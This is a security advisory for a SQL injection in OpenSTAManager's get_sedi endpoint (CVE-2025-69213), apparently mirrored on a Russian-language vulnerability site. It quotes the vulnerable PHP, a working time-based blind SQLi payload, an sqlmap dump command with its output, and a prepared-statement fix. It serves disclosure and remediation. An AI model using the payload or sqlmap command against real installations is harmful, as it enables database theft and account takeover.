GHSA-w995-ff8h-rppg

Опубликовано: 03 фев. 2026

Источник: github

Github: Прошло ревью

CVSS4: 8.7

Описание

OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)

Summary

A SQL Injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject malicious SQL code through the idanagrafica parameter, leading to unauthorized database access.

Proof of Concept

Vulnerable Code

File: modules/anagrafiche/ajax/complete.php:28

case 'get_sedi': $idanagrafica = get('idanagrafica'); $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione FROM an_sedi WHERE idanagrafica='".$idanagrafica."' ..."; $rs = $dbo->fetchArray($q);

Data Flow

Source: $_GET['idanagrafica'] → get('idanagrafica')
Vulnerable: User input concatenated directly into SQL query with single quotes
Sink: $dbo->fetchArray($q) executes the malicious query

Exploit

Manual PoC (Time-based Blind SQLi):

GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1 Host: localhost:8081 Cookie: PHPSESSID=<valid-session>

SQLMap Exploitation:

sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \ --cookie="PHPSESSID=<session>" \ --dbms=MySQL \ --technique=T \ --level=3 \ --dump

SQLMap Output:

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF back-end DBMS: MySQL >= 5.0.12

Impact

Data Exfiltration: Complete database extraction including user credentials, customer data, financial records
Privilege Escalation: Modification of zz_users table to gain admin access
Data Integrity: Unauthorized modification or deletion of records
Potential RCE: Via SELECT ... INTO OUTFILE if file permissions allow

Affected Versions

OpenSTAManager: Verified in latest version (as of December 2025)
All versions using this endpoint are likely affected

Remediation

Replace direct concatenation with prepared statements:

Before:

$idanagrafica = get('idanagrafica'); $q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

After:

$idanagrafica = get('idanagrafica'); $q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

Credit

Discovered by: Łukasz Rybak

Ссылки

https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg

Пакеты

Наименование

devcode-it/openstamanager

composer

Затронутые версииВерсия исправления

<= 2.9.8

Отсутствует

EPSS

Процентиль: 8%

0.0003

Низкий

8.7 High

CVSS4

CVE ID

CVE-2025-69213

Дефекты

CWE-89

Связанные уязвимости

CVE-2025-69213

nvd

3 дня назад

OpenSTAManager is an open source management software for technical assistance and invoicing. In version 2.9.8 and prior, a SQL Injection vulnerability exists in the ajax_complete.php endpoint when handling the get_sedi operation. An authenticated attacker can inject malicious SQL code through the idanagrafica parameter, leading to unauthorized database access. At time of publication, no known patch exists.

EPSS

Процентиль: 8%

0.0003

Низкий

8.7 High

CVSS4

CVE ID

CVE-2025-69213

Дефекты

CWE-89